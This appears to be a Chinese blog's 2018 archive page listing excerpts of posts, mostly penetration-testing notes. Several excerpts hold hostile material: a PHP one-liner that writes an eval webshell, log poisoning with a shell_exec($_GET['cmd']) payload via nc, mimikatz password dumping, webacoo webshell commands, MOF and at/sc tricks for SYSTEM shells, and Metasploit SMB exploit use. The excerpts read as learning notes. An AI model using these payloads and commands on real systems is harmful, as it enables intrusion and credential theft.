01 2018 档案
摘要:问题:如下面一颗树形结构,如何删除节点C? T T / \ / \ A E A E / \ -> / \ B C B D / D 首先树节点的结构体: 初始化节点: 创建一颗上图所示的树 现在我想删除C节点 通过中序输出后的效果要达到如下: 删除前: 10 30 40 50 70 90 删除后: 1
阅读全文
摘要:http://old.kali.org/kali-images/
阅读全文
摘要:wget http://www.kegel.com/wine/winetricks chmod +x winetricks ./winetricks 钩选msxml3就可以了。 _________________Wine与中文显示补丁的安装 Wine注册表设置 wine msiexec.exe /i
阅读全文
摘要:github地址:https://github.com/demonxian3/LittleScript/blob/master/SSHprotecter.sh 使用方法: 1.给足脚本权限,chmod 755 SSHprotecter.sh 2.使用crontab周期执行,如果是每隔10分钟执行一次
阅读全文
摘要:1.导入私钥,将私钥文件放到当前登陆用户目录下的.ssh目录下 2.指定私钥登陆,ssh -i .ssh/ssh_rsa root@target.com 如果出现了下面这种情况 这是因为私钥文件权限太高了,比较不安全,所以被阻止,需要将ssh_rsa的权限设置低一些比如 0400 chmod 040
阅读全文
摘要:show exploit show payload msf使用数据库加快搜索,不然每次都等半天 service postgresql startmsfdb reinitmsf > db_rebuild_cache 需要等待几分钟 查询漏洞对应的模块 use exploit/windows/smb/m
阅读全文
摘要:与防病毒厂商共享信息 VirusTotal https://www.virustotal.com/zh-cn VirScan https://virscan.org 黑产在线查杀引擎 https://nodistribute.com http://viruscheckmate.com扫描网站安全性
阅读全文
摘要:不经意间找到了大牛总结的一些Linux提权exp 我直接借花献佛分享给大家
阅读全文
摘要:只记录解决问题的方法。 mysql 版本: 5.7.18 问题: 在执行mysql 函数load_file时,该函数将加载指定文件的内容,存储至相应字段。如: SELECT LOAD_FILE("D:\aa.txt"); 但是执行时总是返回为空。各种斜线都尝试了。 经过查阅资料得:https://s
阅读全文
摘要:一,利用MOF提权 Windows 管理规范 (WMI) 提供了以下三种方法编译到 WMI 存储库的托管对象格式 (MOF) 文件: 方法 1: 运行 MOF 文件指定为命令行参数将 Mofcomp.exe 文件。 方法 2: 使用 IMofCompiler 接口和 $ CompileFile 方法
阅读全文
摘要:#include #include #define OK 1 typedef int Status; typedef struct { char *data; int len; }String; Status strInit(String *T){ T->data = NULL; T->len = 0; return OK; } //**************...
阅读全文
摘要:webacoo -g 生成一句话 -o 输出文件 -r 不混淆代码 -t 连接模式 -u 制定URL 生成一句话 webacoo -g -o a.php 连接一句话 webacoo -t -u http://url/a.php
阅读全文
摘要:命令执行 应用有时需要调用一些执行系统命令的函数,如PHP中的system、exec、shell_exec、 passthru、popen、proc_popen等,当用户能控制这些函数中的参数时,就可以将恶意系统命令 拼接到正常命令中,从而造成命令执行攻击,这就是命令执行漏洞。 利用条件 1.应用调
阅读全文
摘要:mimikatz用法 privilege::debug 进入debug模式 sekurlsa::logonPasswords 查看所有用户密码 sekurlsa::wdigest 读取当前登录用户 process::list 查看进程 process::suspend /pid:5576 暂停557
阅读全文
摘要:python很好用,尤其是用过easy_install的朋友更是觉得它的便捷,卸载命令也很简单 easy_install -m package-name但是面对源码安装的怎么办呢? setup.py 帮助你纪录安装细节方便你卸载python setup.py install --record log
阅读全文
摘要:今天无意间看到了许多奇怪的进程,占用CPU还挺多的, 于是 lastb 查看登录失败日志,发现都被写爆了,看来很有可能被爆破成功进去了 攻击者的地址是同网段的,很有可能云服务器的邻居先被攻下,然后挂着爆破ssh脚本来24小时破解 看到这个马上首先做的就是禁了IP iptables -A INPUT
阅读全文
摘要:扫描端口 nc -z -v -n 192.168.10.100 20-200 连接服务 nc -v 192.168.10.100 21 开启服务 nc -l -p 444 聊天 一台开启444端口:nc -l -p 444 另一台连接444端口:nc -v 192.168.10.100 444 然后
阅读全文
摘要:<?php fputs(fopen("x.php","w"),"<?php @eval(\$_POST['x']);?>");?> 写入日志文件 chmod 777 /var/log/httpd nc xxx 80 <?php echo shell_exec($_GET['cmd']);?> cat
阅读全文
摘要:最近不少用户在windows2003 server 32位操作系统上安装SQL Server2008总是失败,出现大量错误。今天经过通过我反复测试安装,找出了一个便捷的安装方法,节省大家宝贵时间,具体方法如下,供大家参考: 准备工作: 首先需要下载下面这个软件 1.Windows Installer
阅读全文
摘要:schtasks /create 创建任务,下面是常用参数 /tn taskname /tr taskrun /sc schedule [Minute | Hourly | Daly | Weekly | Monthly | Once | Onstart | Onlogon | Onidle ] 说
阅读全文
摘要:at 8:00 /interactive cmd.exe 以system用户打开cmd.exe taskkill explorer taskadd explorer 以system用户打开桌面 sc create syscmd binpath = "cmd /k start" type = own
阅读全文
